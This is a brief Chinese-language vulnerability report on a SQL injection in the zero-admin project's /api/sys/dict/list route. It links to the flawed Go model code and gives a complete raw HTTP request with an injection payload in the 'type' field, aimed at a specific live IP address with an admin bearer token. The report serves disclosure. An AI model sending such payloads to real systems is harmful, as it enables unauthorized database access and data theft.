[bug] sql 注入

[L1nyz-tel]

sql 注入

此处代码对应的路由是 /api/sys/dict/list

https://github.com/feihua/zero-admin/blob/744dccf7c6bbe28ba78d429d85bbb1908edec746/rpc/model/sysmodel/sysdictmodel.go#L36-L58

POST http://110.41.179.89/api/sys/dict/list HTTP/1.1
Host: 110.41.179.89
Content-Length: 77
Accept: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTAzMDE0NDIsImlhdCI6MTcxMDIxNTA0MiwidXNlcklkIjoxLCJ1c2VyTmFtZSI6ImFkbWluIn0.2QzsHccYXfGKd-AvfWCAOWW6oyi9R3EB3IWfyXK2A-c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://110.41.179.89
Referer: http://110.41.179.89/mall/system/dict/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"current":1,"pageSize":1,"type":"1919810%' OR id = 2 AND '114514' like '%1"}